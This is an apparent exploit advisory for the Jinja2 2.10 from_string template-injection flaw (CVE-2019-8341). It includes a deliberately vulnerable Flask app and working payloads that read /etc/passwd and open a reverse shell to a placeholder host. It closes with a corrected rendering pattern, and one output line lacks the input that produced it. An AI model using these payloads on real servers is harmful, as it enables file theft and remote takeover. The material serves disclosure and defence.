Jinja2 2.10 Command Injection

Jinja2 version 2.10 suffers from a command injection vulnerability.

MD5 | 11bfeb8f8d50d84b15935cf7f8b3274f

# Exploit Title: Jinja2 Command injection from_string function
# Date: [date]
# Exploit Author: JameelNabbo
# Website: Ordina.nl
# Vendor Homepage: http://jinja.pocoo.org
# Software Link: https://pypi.org/project/Jinja2/#files
# Version: 2.10
# Tested on: Kali Linux
# CVE-2019-8341

The from_string function is prone to SSTI: it takes the "source" parameter as the template source, compiles it into a template object, renders it and returns the result. Anything a user controls inside that source is therefore parsed as template syntax, not as data.

Here is an example of vulnerable code that uses from_string to handle a GET variable called 'username' and returns Hello {username}:

from flask import Flask, request
from jinja2 import Environment

app = Flask(__name__)

@app.route('/')
def index():
    # User input is concatenated into the template SOURCE, so Jinja2
    # parses it as template syntax instead of treating it as data.
    username = request.values.get('username', '')
    return Environment().from_string('Hello ' + username).render()

if __name__ == "__main__":
    # serve locally on port 4444, matching the URLs below
    app.run(host='127.0.0.1', port=4444)

Exploiting the username parameter
OUTPUT: Hello 16

Reading the /etc/passwd

http://localhost:4444/?username={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}

Getting a reverse shell
http://localhost:4444/?username={{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }}

How to prevent it:
Never let the user provide template content.
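The fix is to keep the template source constant and pass user input to render() as a variable, so Jinja2 treats it as data. The following is an added example, not code from the original advisory or from the Jinja2 project; it shows the vulnerable pattern from the page next to the corrected one, using plain jinja2 without Flask so it runs stand-alone. The function names render_vulnerable and render_fixed and the probe string are constructed for this illustration.

```python
from jinja2 import Environment

# Vulnerable pattern (as on the page): user input becomes part of the
# template SOURCE, so template syntax in it is evaluated.
def render_vulnerable(username: str) -> str:
    return Environment().from_string('Hello ' + username).render()


# Corrected pattern: the template source is a constant compiled once;
# autoescape=True additionally HTML-escapes the rendered value, which
# matters when the result is returned as HTML.
_env = Environment(autoescape=True)
_GREETING = _env.from_string('Hello {{ username }}')

def render_fixed(username: str) -> str:
    # The user value is only ever a variable passed to render(), never
    # spliced into the template source, so it cannot reach template syntax.
    return _GREETING.render(username=username)


if __name__ == "__main__":
    # Constructed probe: arithmetic inside template delimiters. If it is
    # evaluated, the source was user-controlled.
    probe = '{{ 7*7 }}'
    print(render_vulnerable(probe))   # template syntax evaluated
    print(render_fixed(probe))        # returned verbatim as text
    print(render_fixed('<b>x</b>'))   # HTML-escaped as well
```

A quick regression check for a code base is to search for from_string (and Template(...)) calls whose argument is built from request data; each such call site is an instance of the pattern above and should be converted to a constant template with the user value passed to render().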
